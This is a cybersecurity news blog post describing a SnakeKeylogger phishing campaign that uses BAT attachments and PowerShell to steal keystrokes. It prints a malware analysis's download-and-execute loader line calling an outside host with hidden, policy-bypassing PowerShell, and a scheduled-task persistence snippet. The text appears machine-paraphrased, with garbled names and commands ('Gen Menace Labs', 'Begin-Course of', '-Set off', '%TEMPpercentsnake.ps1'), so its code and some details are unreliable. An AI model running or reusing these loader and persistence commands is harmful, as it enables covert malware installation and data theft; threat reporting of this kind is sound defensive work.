Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data

SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data

Posted on October 10, 2025October 10, 2025 By CWS

Rising from a current wave of focused campaigns, SnakeKeylogger has surfaced as a potent infostealer that capitalizes on PowerShell and social engineering.

The malware’s operators craft convincing spear-phishing e-mails below aliases equivalent to “CPA-Fee Information,” impersonating respected monetary and analysis companies.

Recipients encounter ISO or ZIP attachments containing a seemingly innocuous BAT script. As soon as executed, this script downloads and launches a PowerShell payload designed to reap keystrokes and system info earlier than exfiltrating information to a distant server.

Gen Menace Labs analysts famous the malware’s seamless mix of legit Home windows utilities and customized scripting for stealth and speedy deployment.

After opening the attachment, victims unwittingly activate a BAT file resembling the next snippet:

@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command “& {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMPpercentsnake.ps1; Begin-Course of powershell -ArgumentList ‘-NoP -NonI -W Hidden -Exec Bypass -File %TEMPpercentsnake.ps1’}”

This method bypasses commonplace execution insurance policies and conceals seen home windows, permitting SnakeKeylogger to function with out elevating suspicion.

The PowerShell script, as soon as loaded, establishes persistence by creating scheduled duties and registry entries, guaranteeing the malware survives reboots and avoids cursory incident response efforts.

Past preliminary supply, SnakeKeylogger’s affect lies in its minimalist however environment friendly information assortment routines. Upon activation, the script invokes Home windows API features to seize keystrokes, clipboard contents, and energetic window titles.

Collected info is batched and encoded earlier than transmission to a command-and-control server.

Noticed IoCs embrace BAT payload SHA256 hashes equivalent to 3796e68… and the PowerShell script URL hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1, indicative of the continuing marketing campaign.

An infection Mechanism

SnakeKeylogger’s an infection chain hinges on its two-stage loader. The preliminary BAT script exploits PowerShell’s unrestricted execution to retrieve the core keylogger module.

Inside the PowerShell payload, the Add-Kind cmdlet compiles C# code on the fly, injecting features equivalent to GetAsyncKeyState for low-level keystroke interception.

Persistence is achieved by way of a scheduled process entry resembling:-

$Motion = New-ScheduledTaskAction -Execute ‘powershell.exe’ -Argument ‘-WindowStyle Hidden -File C:WindowsTempsnake.ps1’
Register-ScheduledTask -TaskName ‘SystemUpdate’ -Motion $Motion -Set off (New-ScheduledTaskTrigger -AtLogon) -RunLevel Highest

This tactic not solely reinstates the keylogger at every person login but in addition blends into legit Home windows upkeep processes, complicating detection. Steady monitoring and well timed updates to endpoint safety insurance policies are advisable to counteract this evolving menace.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Data, Emails, Exfiltrate, Leverage, PowerShell, Sensitive, SnakeKeylogger, Weaponized

Post navigation

Previous Post: Sophisticated Malware Deployed in Oracle EBS Zero-Day Attacks
Next Post: LLM-enabled MalTerminal Malware Leverages GPT-4 to Generate Ransomware Code

Related Posts

New npm Attack Targets Developers with Hidden Malware New npm Attack Targets Developers with Hidden Malware Cyber Security News
Hackers Using Calendly-Themed Phishing Attack to Steal Google Workspace Account Hackers Using Calendly-Themed Phishing Attack to Steal Google Workspace Account Cyber Security News
Hackers Can Manipulate Claude AI APIs with Indirect Prompts to Steal User Data Hackers Can Manipulate Claude AI APIs with Indirect Prompts to Steal User Data Cyber Security News
SSH Auth Keys Reuse Exposes Sophisticated Targeted Phishing Attack SSH Auth Keys Reuse Exposes Sophisticated Targeted Phishing Attack Cyber Security News
macOS Gatekeeper Explained: Strengthening System Defenses macOS Gatekeeper Explained: Strengthening System Defenses Cyber Security News
New ClickFix Attack Uses Fake BBC News Page and Fraudulent Cloudflare Verification to Trick Users New ClickFix Attack Uses Fake BBC News Page and Fraudulent Cloudflare Verification to Trick Users Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026
  • Top Spam Filter Tools for 2026: A Comprehensive Guide

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026
  • Top Spam Filter Tools for 2026: A Comprehensive Guide

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark